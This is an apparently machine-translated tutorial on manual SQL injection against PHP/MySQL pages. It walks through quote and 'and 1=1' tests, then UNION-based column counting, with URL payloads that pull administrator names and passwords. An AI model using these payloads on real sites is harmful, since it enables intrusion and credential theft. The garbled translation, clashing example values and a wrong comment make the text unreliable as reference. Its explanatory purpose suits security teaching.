PHP + MYSQL injection (Analysis)

Suppose the target website http://www.bkjia.com/info. php? Articleid = 123 (cannot be injected)
When the value of the articleid variable is 123, let's assume what code will run on the server?
1. SELECT */* Select function read information */
2. FROM infotable/* FROM the products data table */
3. WHERE id = '20140901';/* false when the condition is met */
/* XXXX */is the annotation symbol. When the program is running,/**/and some computers in the middle will automatically ignore it.
The actual code executed by the system is as follows:
1. select * from infotable where id = '201312 ';
Here, the id value is "123" obtained through the url value. What if I do this:
Info. php? Articleid = 123'
A single quotation mark is added next to it to compare the changes in the statements originally executed by the system:
1. select * from infotable where id = 123;
2. select * from infotable where id = 123 ';
A quotation mark is added at the end, indicating that the syntax is incorrect.
Note: computer programming cannot get the expected results. There are two types of errors: syntax errors and logic errors. After
Read carefully and you will understand the difference.
This is why the first step of determining whether the injection point should be followed by a single quotation mark (single quotation marks ).
The website cannot be determined as an injection point by mistake, but it is only a step of judgment.
So the purpose of 1 = 1 and 1 = 2 is clear.
1. select * from infotable where id = 123;
2. select * from infotable where id = 123 and 1 = 1; // In fact, 1 is 1, so it should
Back to normal page
3. select * from infotable where id = 123 and 1 = 2; // In fact, in the computer, 1 is always
If the value is not 2, a logic error occurs. Therefore, the error page is returned.
Manual injection usually uses the union query function. The following describes the union usage.
The first step of union injection is generally to guess the number of fields.
If the injection point is a news page, the SQL statement executed on the page is:
1. select title, date, author, news, comm from news where id = 12;
When you perform union injection, the statement before union and the statement after union are both a complete SQL statement.
Statement, which can be executed separately
However, make sure that the numbers of fields are the same. For example, the preceding statement
1. select title, date, author, news, comm from news where id = 12;
2. select title, date, author, news, comm from news where id = 12 union select
Name, password, 3, 4, 5 from admin;
3. // news is the news table segment, and admin is the administrator information segment.
4. // The Administrator information table section does not have the number of fields contained in the news table section before union.
3 to 5 replicas, numbers do not have a fixed format, can make 1 2 and 3, can also be 111111 and 4435435
Or simply use null instead.
Therefore, the preceding injection statement is constructed as follows:
1. info. php? Id = 12 + union + select + name, password, 3, 4, 5 + from + admin
2. // in SQL injection, the plus sign indicates space, because some browsers automatically convert the space to % 20,
If there are five in front of the union, but not five in the end of the union, a logic error occurs. The error page is displayed.
As programmers write programs, we do not know that they have set several fields in the database, so we are generally advanced.
Guess the number of row fields, that is:
1. info. php? Id = 12 + union + select + 1
2. info. php? Id = 12 + union + select + 1, 2
3. info. php? Id = 12 + union + select + 1, 2, 3
4. info. php? Id = 12 + union + select + 1, 2, 3, 4
5. info. php? Id = 12 + union + select + 1, 2, 3, 4, 5
6. // you can also use order by to guess the usage.
The correct page is always guessed in this way. Without a logical error, it means that the number of fields is consistent, and then... ...
Here we only provide ideas...